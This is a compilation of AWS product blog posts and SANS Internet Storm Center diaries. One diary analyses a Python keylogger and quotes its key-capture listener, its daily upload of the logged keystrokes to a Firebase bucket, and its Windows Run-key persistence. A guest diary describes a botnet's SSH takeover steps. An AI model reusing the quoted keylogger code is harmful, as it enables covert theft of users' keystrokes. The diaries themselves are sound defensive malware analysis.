Amazon S3 Express One Zone now supports AWS KMS with customer managed keys

This post was originally published on this site

Amazon S3 Express One Zone, a high-performance, single-Availability Zone (AZ) S3 storage class, now supports server-side encryption with AWS Key Management Service (KMS) keys (SSE-KMS). S3 Express One Zone already encrypts all objects stored in S3 directory buckets with Amazon S3 managed keys (SSE-S3) by default. Starting today, you can use AWS KMS customer managed keys to encrypt data at rest, with no impact on performance. This new encryption capability gives you an additional option to meet compliance and regulatory requirements when using S3 Express One Zone, which is designed to deliver consistent single-digit millisecond data access for your most frequently accessed data and latency-sensitive applications.

S3 directory buckets allow you to specify only one customer managed key per bucket for SSE-KMS encryption. Once the customer managed key is added, you cannot edit it to use a new key. On the other hand, with S3 general purpose buckets, you can use multiple KMS keys either by changing the default encryption configuration of the bucket or during S3 PUT requests. When using SSE-KMS with S3 Express One Zone, S3 Bucket Keys are always enabled. S3 Bucket Keys are free and reduce the number of requests to AWS KMS by up to 99%, optimizing both performance and costs.

Using SSE-KMS with Amazon S3 Express One Zone
To show you this new capability in action, I first create an S3 directory bucket in the Amazon S3 console following the steps to create a S3 directory bucket and use apne1-az4 as the Availability Zone. In Base name, I enter s3express-kms and a suffix that includes the Availability Zone ID wich is automatically added to create the final name. Then, I select the checkbox to acknowledge that Data is stored in a single Availability Zone.

In the Default encryption section, I choose Server-side encryption with AWS Key Management Service keys (SSE-KMS). Under AWS KMS Key I can Choose from your AWS KMS keys, Enter AWS KMS key ARN, or Create a KMS key. For this example, I previously created an AWS KMS key, which I selected from the list, and then choose Create bucket.

Now, any new object I upload to this S3 directory bucket will be automatically encrypted using my AWS KMS key.

SSE-KMS with Amazon S3 Express One Zone in action
To use SSE-KMS with S3 Express One Zone via the AWS Command Line Interface (AWS CLI), you need an AWS Identity and Access Management (IAM) user or role with the following policy . This policy allows the CreateSession API operation, which is necessary to successfully upload and download encrypted files to and from your S3 directory bucket.

{
	"Version": "2012-10-17",
	"Statement": [
		{
			"Effect": "Allow",
			"Action": [
				"s3express:CreateSession"
			],
			"Resource": [
				"arn:aws:s3express:*:<account>:bucket/s3express-kms--apne1-az4--x-s3"
			]
		},
		{
			"Effect": "Allow",
			"Action": [
				"kms:Decrypt",
				"kms:GenerateDataKey"
			],
			"Resource": [
				"arn:aws:kms:*:<account>:key/<keyId>"
			]
		}
	]
}

With the PutObject command, I upload a new file named confidential-doc.txt to my S3 directory bucket.

aws s3api put-object --bucket s3express-kms--apne1-az4--x-s3 
--key confidential-doc.txt 
--body confidential-doc.txt

As a success of the previous command I receive the following output:

{
    "ETag": ""664469eeb92c4218bbdcf92ca559d03b"",
    "ChecksumCRC32": "0duteA==",
    "ServerSideEncryption": "aws:kms",
    "SSEKMSKeyId": "arn:aws:kms:ap-northeast-1:<accountId>:key/<keyId>",
    "BucketKeyEnabled": true
}

Checking the object’s properties with HeadObject command, I see that it’s encrypted using SSE-KMS with the key that I created before:

aws s3api head-object --bucket s3express-kms--apne1-az4--x-s3 
--key confidential-doc.txt

I get the following output:

 
{
    "AcceptRanges": "bytes",
    "LastModified": "2024-08-21T15:29:22+00:00",
    "ContentLength": 5,
    "ETag": ""664469eeb92c4218bbdcf92ca559d03b"",
    "ContentType": "binary/octet-stream",
    "ServerSideEncryption": "aws:kms",
    "Metadata": {},
    "SSEKMSKeyId": "arn:aws:kms:ap-northeast-1:<accountId>:key/<keyId>",
    "BucketKeyEnabled": true,
    "StorageClass": "EXPRESS_ONEZONE"
}

I download the encrypted object with GetObject:

aws s3api get-object --bucket s3express-kms--apne1-az4--x-s3 
--key confidential-doc.txt output-confidential-doc.txt

As my session has the necessary permissions, the object is downloaded and decrypted automatically.

{
    "AcceptRanges": "bytes",
    "LastModified": "2024-08-21T15:29:22+00:00",
    "ContentLength": 5,
    "ETag": ""664469eeb92c4218bbdcf92ca559d03b"",
    "ContentType": "binary/octet-stream",
    "ServerSideEncryption": "aws:kms",
    "Metadata": {},
    "SSEKMSKeyId": "arn:aws:kms:ap-northeast-1:<accountId>:key/<keyId>",
    "BucketKeyEnabled": true,
    "StorageClass": "EXPRESS_ONEZONE"
}

For this second test, I use a different IAM user with a policy that is not granted the necessary KMS key permissions to download the object. This attempt fails with an AccessDenied error, demonstrating that the SSE-KMS encryption is functioning as intended.

An error occurred (AccessDenied) when calling the CreateSession operation: Access Denied

This demonstration shows how SSE-KMS works seamlessly with S3 Express One Zone, providing an additional layer of security while maintaining ease of use for authorized users.

Things to know
Getting started – You can enable SSE-KMS for S3 Express One Zone using the Amazon S3 console, AWS CLI, or AWS SDKs. Set the default encryption configuration of your S3 directory bucket to SSE-KMS and specify your AWS KMS key. Remember, you can only use one customer managed key per S3 directory bucket for its lifetime.

Regions – S3 Express One Zone support for SSE-KMS using customer managed keys is available in all AWS Regions where S3 Express One Zone is currently available.

Performance – Using SSE-KMS with S3 Express One Zone does not impact request latency. You’ll continue to experience the same single-digit millisecond data access.

Pricing – You pay AWS KMS charges to generate and retrieve data keys used for encryption and decryption. Visit the AWS KMS pricing page for more details. In addition, when using SSE-KMS with S3 Express One Zone, S3 Bucket Keys are enabled by default for all data plane operations except for CopyObject and UploadPartCopy, and can’t be disabled. This reduces the number of requests to AWS KMS by up to 99%, optimizing both performance and costs.

AWS CloudTrail integration – You can audit SSE-KMS actions on S3 Express One Zone objects using AWS CloudTrail. Learn more about that in my previous blog post.

– Eli.

23:59, Time to Exfiltrate!, (Tue, Sep 17th)

This post was originally published on this site

Last week, I posted a diary about suspicious Python modules. One of them was Firebase [1], the cloud service provided by Google[2]. Firebase services abused by attackers is not new, usually, it’s used to host malicious files that will be available to download[3]. This is a nice location because who will think that a Google link is malicious?

Today, while reviewing my hunting results, I found an interesting Python script (again!) that relies on Firebase but this time to exfiltrate data. Unfortunately, the file was stand-alone and I missed the JSON file containing the credentials to connect to the Firebase account. The file "iLoveYou.py" has a low score on VT (2/65) (SHA256:ec88244d7b037306bdb53d60f2a709af13ca74d15937d9901c8cd90bc00720f6)[4]

The file is a classic keylogger. Very easy to implement in Python using pyinput[5]:

from pynput.keyboard import Key, Listener
...
with Listener(on_press=tus_basildi) as listener:
    listener.join()

Every key press will generate a call to the function tus_basildi(). Note: the variable names are based on Turkish words

This keylogger has been implemented in a “funny” way: Key presses are logged and stored in a temporary file. But the file will be exfiltrated daily at 23:59:

current_time = time.strftime("%H:%M")
if current_time == "23.59":
    if sayac == 0:
        blob = bucket.blob(bulut_path)
        blob.upload_from_filename(yerel_dosya)
        sayac = 1

Another funny fact: The script is buggy! Once the file has been exfiltrated at 23:59, the variable ‘savac’ will be set to 1 but never reset. If the script runs for over 24 hours, it will never exfiltrate the file again. Maybe the attacker expects the victim to log in every day?

Persistence is implemented classically via a Run key:

def reg_olustur(nereye_koyucam, adi_ne_bunun, ne_yapicak_bu_sey):
    elektar = winreg.OpenKey(winreg.HKEY_CURRENT_USER, nereye_koyucam, 0, winreg.KEY_WRITE)
    winreg.SetValueEx(elektar, adi_ne_bunun, 0, winreg.REG_SZ, ne_yapicak_bu_sey)
    winreg.CloseKey(elektar)

nereye_koycam = "SoftwareMicrosoftWindowsCurrentVersionRun"
adi_ne_bunun = bilgisayar_adi
ne_yapicak_bu_sey = f"C:WindowsSystem32Tasksiloveyou.exe"
reg_olustur(nereye_koycam, adi_ne_bunun, ne_yapicak_bu_sey)

The fact that an executable will be launched at login time, this Python script will probably be compiled. It should copy itself in the Tasks directory:

kaynak_dosya = 'iloveyou.exe'
hedef_dizin = 'C:WindowsSystem32Tasks'
shutil.copy(kaynak_dosya, hedef_dizin)

I tried to find the executable, without luck! But I found a previous version of the script, created a few days before (SHA256:43a4d56c11a12de13b8d2186daf5b00d793076fb47afcee5ecd0b327a634e150)

[1] https://pypi.org/project/firebase/
[2] https://firebase.google.com/solutions
[3] https://isc.sans.edu/diary/Recent+IcedID+Bokbot+activity/29740
[4] https://www.virustotal.com/gui/file/ec88244d7b037306bdb53d60f2a709af13ca74d15937d9901c8cd90bc00720f6
[5] https://pypi.org/project/pynput/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

AWS Weekly Roundup: Oracle Database@AWS, Amazon RDS, AWS PrivateLink, Amazon MSK, Amazon EventBridge, Amazon SageMaker and more

This post was originally published on this site

Hello, everyone!

It’s been an interesting week full of AWS news as usual, but also full of vibrant faces filling up the rooms in a variety of events happening this month.

Let’s start by covering some of the releases that have caught my attention this week.

My Top 3 AWS news of the week

Amazon RDS for MySQL zero-ETL integrations is now generally available and it comes with exciting new features. You are now able to configure zero-ETL integrations in your AWS CloudFormation templates, and you also now have the ability to set up multiple integrations from a source Amazon RDS for MySQL database with up to five Amazon Redshift warehouses. Lastly, you can now also apply data filters which determine which database and tables get automatically replicated. Read this blog post where I review aspects of this release and show you how to get started with data filtering if you want to know more. Incidentally, this release pairs well with another release this week: Amazon Redshift now allows you to alter the sort keys of tables replicated via zero-ETL integrations.

Oracle Database@AWS has been announced as part of a strategic partnership between Amazon Web Services (AWS) and Oracle. This offering allows customers to access Oracle Autonomous Database and Oracle Exadata Database Service directly within AWS simplifying cloud migration for enterprise workloads. Key features include zero-ETL integration between Oracle and AWS services for real-time data analysis, enhanced security, and optimized performance for hybrid cloud environments. This collaboration addresses the growing demand for multi-cloud flexibility and efficiency. It will be available in preview later in the year with broader availability in 2025 as it expands to new Regions.

Amazon OpenSearch Service now supports version 2.15, featuring improvements in search performance, query optimization, and AI-powered application capabilities. Key updates include radial search for vector space queries, optimizations for neural sparse and hybrid search, and the ability to enable vector and hybrid search on existing indexes. Additionally, it also introduces new features like a toxicity detection guardrail and an ML inference processor for enriching ingest pipelines. Read this guide to see how you can upgrade your Amazon OpenSearch Service domain.

So simple yet so good
These releases are simple in nature, but have a big impact.

AWS Resource Access Manager (RAM) now supports AWS PrivateLink – With this release, you can now securely share resources across AWS accounts with private connectivity, without exposing traffic to the public internet. This integration allows for more secure and streamlined access to shared services via VPC endpoints, improving network security and simplifying resource sharing across organizations.

AWS Network Firewall now supports AWS PrivateLink – another security quick-win, you can now securely access and manage Network Firewall resources without exposing traffic to the public internet.

AWS IAM Identity Center now enables users to customize their experience – You can set the language and visual mode preferences, including dark mode for improved readability and reduced eye strain. This update supports 12 different languages and enables users to adjust their settings for a more personalized experience when accessing AWS resources through the portal​.

Others
Amazon EventBridge Pipes now supports customer managed KMS keysAmazon EventBridge Pipes now supports customer-managed keys for server-side encryption. This update allows customers to use their own AWS Key Management Service (KMS) keys to encrypt data when transferring between sources and targets, offering more control and security over sensitive event data. The feature enhances security for point-to-point integrations without the need for custom integration code. See instructions on how to configure this in the updated documentation. 

AWS Glue Data Catalog now supports enhanced storage optimization for Apache Iceberg tables – This includes automatic removal of unnecessary data files, orphan file management, and snapshot retention. These optimizations help reduce storage costs and improve query performance by continuously monitoring and compacting tables, making it easier to manage large-scale datasets stored in Amazon S3. See this Big Data blog post for a deep dive into this new feature.

Amazon MSK Replicator now supports the replication of Kafka topics across clusters while preserving identical topic namesThis simplifies cross-cluster replication processes allowing users to replicate data across regions without needing to reconfigure client applications. This reduces setup complexity and enhances support for more seamless failovers in multi-cluster streaming architectures​. See this Amazon MSK Replicator developer guide to learn more about it.

Amazon SageMaker introduces sticky session routing for inferenceThis allows requests from the same client to be directed to the same model instance for the duration of a session improving consistency and reducing latency, particularly in real-time inference scenarios like chatbots or recommendation systems, where session-based interactions are crucial​. Read about how to configure it in this documentation guide.

Events
The AWS GenAI Lofts continue to pop up around the world! This week, developers in San Francisco had the opportunity to attend two very exciting events at the AWS Gen AI Loft in San Francisco including the “Generative AI on AWS” meetup last Tuesday, featuring discussions about extended reality, future AI tools, and more. Then things got playful on Thursday with the demonstration of an Amazon Bedrock-powered MineCraft bot and AI video game battles! If you’re around San Francisco before October 19th make sure to check out the schedule to see the list of events that you can join.

AWS GenAI Loft San Francisco talk

Make sure to check out the AWS GenAI Loft in Sao Paulo, Brazil, which opened recently, and the AWS GenAI Loft in London, which opens September 30th. You can already start registering for events before they fill up including one called “The future of development” that offers a whole day of targeted learning for developers to help them accelerate their skills.

Our AWS communities have also been very busy throwing incredible events! I was privileged to be a speaker at AWS Community Day Belfast where I got to finally meet all of the organizers of this amazing thriving community in Northern Ireland. If you haven’t been to a community day, I really recommend you check them out! You are sure to leave energized by the dedication and passion from communities leaders like Matt Coulter, Kristi Perreault, Matthew Wilson, Chloe McAteer, and their community members – not to mention the smiles all around. 🙂

AWS Community Belfast organizers and codingmatheus

Certifications
If you’ve been postponing taking an AWS certification exam, now is the perfect time! Register free for the AWS Certified: Associate Challenge before December 12, 2024 and get a 50% discount voucher to take any of the following exams: AWS Certified Solutions Architect – Associate, AWS Certified Developer – Associate, AWS Certified SysOps Administrator – Associate, or AWS Certified Data Engineer – Associate. My colleague Jenna Seybold has posted a collection of study material for each exam; check it out if you’re interested.

Also, don’t forget that the brand new AWS Certified AI Practitioner exam is now available. It is in beta stage, but you can already take it. If you pass it before February 15, 2025, you get an Early Adopter badge to add to your collection.

Conclusion
I hope you enjoyed the news this week!

Keep learning!

Managing PE Files With Overlays, (Mon, Sep 16th)

This post was originally published on this site

There is a common technique used by attackers: They append some data at the end of files (this is called an overlay). This can be used for two main reasons: To hide the appended data from the operating system (steganography). By example, you can append a text file at the end of a JPEG image. When your favourite image viewer will process the picture, it will just ignore the "rogue" data. Here is a PNG picture that has a text file (dir output) added at the end:

The second reason is to defeat security controls and tools by creating a very big file. For performance reasons, many tools won't scan or inspect big files. So attackers will append data to increase the file size. Usually, data are just a suite of zeroes because the compression ration is excellent. Here is recent example of files that I discovered:

remnux@remnux:/MalwareZoo/20240910$ file 'Payment Confirmation.tgz'
Payment Confirmation.tgz: gzip compressed data, last modified: Tue Sep 10 06:05:16 2024, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 750001664 gzip compressed data, unknown method, ASCII, extra field, has comment, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 750001664
remnux@remnux:/MalwareZoo/20240910$ ls -l 'Payment Confirmation.tgz'
-rwx------ 1 remnux remnux 1167212 Sep 10 03:11 'Payment Confirmation.tgz'

The file is 1.1MB in size but it contains a pretty big executable (less common):

remnux@remnux:/MalwareZoo/20240910$ tar tzvf 'Payment Confirmation.tgz'
-rwxr-xr-x 0/0       750000000 2024-09-10 02:04 Payment Confirmation.exe

If you unpack and inspect the file manually, you'll see that it contains indeed a huge amount of NULL bytes:

remnux@remnux:/MalwareZoo/20240910$ xxd 'Payment Confirmation.exe'
...
00093fa0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00093fb0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00093fc0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00093fd0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00093fe0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00093ff0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094000: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094010: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094020: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094030: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094040: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094060: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094070: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094080: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094090: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000940a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000940b0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000940c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000940d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000940e0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000940f0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094100: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094110: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094120: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094130: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094140: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094150: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094160: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094170: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094180: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094190: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000941a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000941b0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000941c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000941d0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000941e0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
000941f0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094200: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094210: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094220: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094230: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094240: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094250: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094260: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094270: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00094280: 0000 0000 0000 0000 0000 0000 0000 0000  ................

From a Windows loader point of view, this is not an issue: it will just ignore all the bytes that are not interesting to execute the process. Thank you Microsoft!

How can you analyze the PE file without being annoyed by the overlay? Just remove it! If you can try to manipulate the file with your favourite text editor, there is an easy way to perform this task in a few lines of Python. A classic PE files looks like this (in a very simple way!): 

In the PE headers, you can find a list of all the sections present in the file with two parameters:

  • The section offset (PointerToRawData)
  • The section size (SizeOfRawData)

It's easy to get the overlay offset: PointerToRawData + SizeOfRawData. This value should be the end of the file. If the file size on disk is bigger, we have an overlay!

Python has a great module called pefile[1] that helps to investigate executables. I wrote a small script to remove an overlay from a PE file:

#!/usr/bin/python3
#
# Detects if a PE file has an overlay.
# If yes, it creates a new PE file without the extra data.
#
import os
import sys
import pefile

def detect_overlay(pe_filename):
    '''
    Detects and removes overlay from a PE file
    '''
    try:
        pe = pefile.PE(pe_filename)
    except Exception as e: 
        print(f"Can't open the PE file: {e}")
        return

    # Display sections
    print(f"{'Section Name':<15} {'Virtual Size':<15} {'Raw Size':<15} {'Raw Offset':<15}")
    print("="*58)
    for s in pe.sections:
        s_name = s.Name.decode('utf-8').rstrip('x00')
        virtual_size = s.Misc_VirtualSize
        raw_size = s.SizeOfRawData
        raw_offset = s.PointerToRawData
        print(f"{s_name:<15} {virtual_size:<15} {raw_size:<15} {raw_offset:<15}")

    # The offset at which the PE sections end
    last_section = pe.sections[-1]
    end_of_pe = last_section.PointerToRawData + last_section.SizeOfRawData

    # The actual file size
    file_size = os.path.getsize(pe_filename)

    if file_size > end_of_pe:
        overlay_size = file_size - end_of_pe
        print(f"Overlay detected: {overlay_size} bytes")
        try:
            with open(pe_filename, 'rb') as infile:
                data = infile.read(end_of_pe)
        except Exception as e:
            print(f"Can't open {pe_filename}: {e}")
            return

        name, ext = os.path.splitext(pe_filename)
        new_pe_filename = f"{name}-clean{ext}"
        try:
            with open(new_pe_filename + "", 'wb') as outfile:
                outfile.write(data)
        except Exception as e:
            print(f"Can't write {new_pe_filename}: {e}")
            return
        new_file_size = os.path.getsize(new_pe_filename)
        print(f"New PE dumped: {new_pe_filename} (Size: {new_file_size})")
    else:
        print("No overlay detected")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 overlay.py <pefilename>")
        sys.exit(1)

    detect_overlay(sys.argv[1])

Let's process our big PE file:

remnux@remnux:/MalwareZoo/20240910$ python3 overlay.py Payment-Confirmation.exe
Section Name    Virtual Size    Raw Size        Raw Offset     
==========================================================
.text           587568          587776          512            
.rsrc           1580            2048            588288         
.reloc          12              512             590336         
Overlay detected: 749409152 bytes
New PE dumped: Payment-Confirmation-clean.exe (Size: 590848)

Now, you can investigate the new sample as usual…

Be careful with overlays! Most of the time, they are just NULL bytes but they may contain useful data that will be used by the malware at execution time (configuration, shellcode, …) 

The PE file was another XWorm… 

[1] https://pypi.org/project/pefile/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

YARA-X's Dump Command, (Sun, Sep 15th)

This post was originally published on this site

YARA-X is not just a rewrite of YARA in Rust, it comes with new features too.

One of these features is the dump command: yr.exe dump …

YARA-X can parse several file formats natively, to support file-format specific YARA rules. These parsers can also be invoked explicitly (without YARA rules for testing). The default output is YAML:

And JSON output is supported too:

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Finding Honeypot Data Clusters Using DBSCAN: Part 2, (Fri, Aug 23rd)

This post was originally published on this site

In an earlier diary [1], I reviewed how using tools like DBSCAN [2] can be useful to group similar data. I used DBSCAN to try and group similar commands submitted to Cowrie [3] and URL paths submitted to the DShield web honeypot [4]. DBSCAN was very helpful to group similar commands, but it was also very useful when trying to determine whether commands from one honeypot were seen in another. How much overlap in attack data is there between honeypots? Is there any targeting based on the hosting location of the honeypot?

Amazon RDS for MySQL zero-ETL integration with Amazon Redshift, now generally available, enables near real-time analytics

This post was originally published on this site

Zero-ETL integrations help unify your data across applications and data sources for holistic insights and breaking data silos. They provide a fully managed, no-code, near real-time solution for making petabytes of transactional data available in Amazon Redshift within seconds of data being written into Amazon Relational Database Service (Amazon RDS) for MySQL. This eliminates the need to create your own ETL jobs simplifying data ingestion, reducing your operational overhead and potentially lowering your overall data processing costs. Last year, we announced the general availability of zero-ETL integration with Amazon Redshift for Amazon Aurora MySQL-Compatible Edition as well as the availability in preview of Aurora PostgreSQL-Compatible Edition, Amazon DynamoDB, and RDS for MySQL.

I am happy to announce that Amazon RDS for MySQL zero-ETL with Amazon Redshift is now generally available. This release also includes new features such as data filtering, support for multiple integrations, and the ability to configure zero-ETL integrations in your AWS CloudFormation template.

In this post, I’ll show how you can get started with data filtering and consolidating your data across multiple databases and data warehouses. For a step-by-step walkthrough on how to set up zero-ETL integrations, see this blog post for a description of how to set one up for Aurora MySQL-Compatible, which offers a very similar experience.

Data filtering
Most companies, no matter the size, can benefit from adding filtering to their ETL jobs. A typical use case is to reduce data processing and storage costs by selecting only the subset of data needed to replicate from their production databases. Another is to exclude personally identifiable information (PII) from a report’s dataset. For example, a business in healthcare might want to exclude sensitive patient information when replicating data to build aggregate reports analyzing recent patient cases. Similarly, an e-commerce store may want to make customer spending patterns available to their marketing department, but exclude any identifying information. Conversely, there are certain cases when you might not want to use filtering, such as when making data available to fraud detection teams that need all the data in near real time to make inferences. These are just a few examples, so I encourage you to experiment and discover different use cases that might apply to your organization.

There are two ways to enable filtering in your zero-ETL integrations: when you first create the integration or by modifying an existing integration. Either way, you will find this option on the “Source” step of the zero-ETL creation wizard.

Interface for adding data filtering expressions to include or exclude databases or tables.

You apply filters by entering filter expressions that can be used to either include or exclude databases or tables from the dataset in the format of database*.table*. You can add multiple expressions and they will be evaluated in order from left to right.

If you’re modifying an existing integration, the new filtering rules will apply from that point in time on after you confirm your changes and Amazon Redshift will drop tables that are no longer part of the filter.

If you want to dive deeper, I recommend you read this blog post, which goes in depth into how you can set up data filters for Amazon Aurora zero-ETL integrations since the steps and concepts are very similar.

Create multiple zero-ETL integrations from a single database
You are now also able to configure up integrations from a single RDS for MySQL database to up to 5 Amazon Redshift data warehouses. The only requirement is that you must wait for the first integration to finish setting up successfully before adding others.

This allows you to share transactional data with different teams while providing them ownership over their own data warehouses for their specific use cases. For example, you can also use this in conjunction with data filtering to fan out different sets of data to development, staging, and production Amazon Redshift clusters from the same Amazon RDS production database.

Another interesting scenario where this could be really useful is consolidation of Amazon Redshift clusters by using zero-ETL to replicate to different warehouses. You could also use Amazon Redshift materialized views to explore your data, power your Amazon Quicksight dashboards, share data, train jobs in Amazon SageMaker, and more.

Conclusion
RDS for MySQL zero-ETL integrations with Amazon Redshift allows you to replicate data for near real-time analytics without needing to build and manage complex data pipelines. It is generally available today with the ability to add filter expressions to include or exclude databases and tables from the replicated data sets. You can now also set up multiple integrations from the same source RDS for MySQL database to different Amazon Redshift warehouses or create integrations from different sources to consolidate data into one data warehouse.

This zero-ETL integration is available for RDS for MySQL versions 8.0.32 and later, Amazon Redshift Serverless, and Amazon Redshift RA3 instance types in supported AWS Regions.

In addition to using the AWS Management Console, you can also set up a zero-ETL integration via the AWS Command Line Interface (AWS CLI) and by using an AWS SDK such as boto3, the official AWS SDK for Python.

See the documentation to learn more about working with zero-ETL integrations.

Matheus Guimaraes

Hygiene, Hygiene, Hygiene! [Guest Diary], (Wed, Sep 11th)

This post was originally published on this site

[This is a Guest Diary by Paul Olson, an ISC intern as part of the SANS.edu BACS program]

Introduction

Starting my internship with SANs Internet Storm Center [1] was daunting from the aspect of being unsure of what to expect. Over the years I’ve completed several SANs courses and have become comfortable with that experience; there is a flow to the courses and the SANs instructors exceed my expectations.  In this respect, the ISC Internship is a completely different animal; it presents a more hands-on learning opportunity, requires more self-reliance, and provides a greater element of unpredictability than I have found in SANs course labs.  With more of the Internship work behind me than in front of me I can say that I have gotten more out of this internship than I have from other similar experiences.

Some of my concerns were about the ‘unknown unknowns’ [2].  Setting up the DShield honeypot [3] was straightforward exercise; my biggest worry was meeting the objectives of the Internship.  Over the years that I have had broadband Internet I have periodically reviewed the logs generated by my home firewall.  The firewall logs didn’t provide a wealth of information (event time, source and destination IP, protocol and ports involved, etc.).  My concern became “How am I going to produce seven attack observation reports out of this?  Who is going to bother with this device connected in a basement to a broadband network in North Dakota, US?”.

As it turns out that wasn’t going to be an issue.  This newly-minted honeypot was remotely interacted with over 1,600 times from 169 distinct IP addresses on the first day; the device currently averages 17,000 probes daily.  Reviewing the honeypot logs, one of the first lessons I learned from the Internship is that there are vast differences between a single-dimension firewall log and the level of detail in the data the honeypot captures when it is probed.

The next challenge was to make some sense of the data and figure out where to begin my analysis.  As I started to dig in, I used tools mentioned in recent SANs classes or in ISC diary entries.  That list includes jq, python, bash, command-line tools such as grep/egrep, sort, awk, PowerShell, some web-based Json-to-csv parsers [4] [5], VirusTotal [6], Joe Sandbox [7], Shodan [8], Mitre ATT&CK [9], and Microsoft Excel.  I have learned how to use the tools (and a little on how not to use the tools) to analyze and understand various command sequences.  Lately I have been working with Python to filter the data and isolate records of interest.  That data is loaded into an Excel spreadsheet for analysis, tables and graphs are created to help visualize the event.  I can use the graphs when I create my report. 

The next part of the puzzle was to figure out how to efficiently utilize those tools.  What am I looking for? What is that next question I should ask? While reviewing log data to identify an interesting set of logs to investigate I found that the ‘Five Ws’ (Who, What, When, Where, Why, How) approach [10] helped organize my investigation.  Answering those questions provided direction and led to asking more useful follow-up questions.  I found that often these ‘W’ questions will be asked in an order that will organically develop based on how each investigation unfolds.  This methodical approach is one that helps me save time and produce a better analysis of the events.  I have found that I often ‘loop back’ to re-ask earlier questions because the answer to some other question provided more clarity or insight. This analysis process is an iterative exercise.

The remainder of this blog post is largely a narrative of a recent event sequence I found in my logs.  As the events unfold in the following sections of the document, I will add some commentary about the process I followed.  I start with the ‘W’ questions, and the answers sometimes point to the next step in the process.

Who | What | When | Where | Why | How | How Long

The honeypot always receives many Telnet/SSH probes, but a series of events appeared that followed a distinct pattern. This is the identification of the incident, this is the 'what' that is happening. 

At a high level, the sequence I started investigating was: 

  1. The actor authenticates to the system using a username/password using the root account [a] [j].
  2. Several commands are executed by the actor to secure access to the device [b].
    • Remove the existing .ssh directory and contents, then create a new public key to enable certificate-based authentication [c].
    • Change the root account password to a random 12-character value [d].
    • Recursively removing the files /tmp/secure.sh [11] and /tmp/auth.sh [e].
  3. The actor launched various commands to profile the system/hardware [f].

Analyzing the command sequence can help us shed some light on the goal of the attack. For this series of events the commands used (after authenticating to the honeypot via SSH) were:



The next step (not captured by the honeypot but identified through research) would be for the actor to upload a file named dota3.tar.gz via SFTP [13].  The actor would execute base-64 encoded command to initialize the malware. Assimilation complete [14] [e] [g] [h] [i].

Who | What | When | Where | Why | How | How Long

Since I had a fair amount of information about the command sequence I next tried to identify the actor. I treated the construction of the key string used to replace the .ssh/authorized_keys file that was placed in the system to gain persistence as an IoC (Indicator of Compromise) [c] [12]. This IoC matched attacks attributed to the ‘Dota’ family of botnets.  The Dota botnet targets IoT devices running SSH servers that use default or poorly chosen passwords.  Once the actor gains access to the device they begin to profile the system, followed by uploading and executing malware on the device to add it to the botnet [i].  The Firm CounterCraft has internally labeled this actor as ‘CC0631’ [13], but at the time of this writing the actual identity of the threat actor has yet to be determined.

Who | What | When | Where | Why | How | How Long

We can summarize the Why of this attack as a desire to ‘assimilate’ this device into a botnet army. Once the actor has assembled their army, we can only assume that they will use it for future (malicious but money-making) activities, such as crypto currency mining, DDOS attacks, spam distribution, data theft, etc.  The Dota3 botnet has been linked to crypto jacking [15], deploying the XMRig [16] agents to compromised systems, indicating that the purpose of the botnet is to engage in crypto mining [13].

Who | What | When | Where | Why | How | How Long

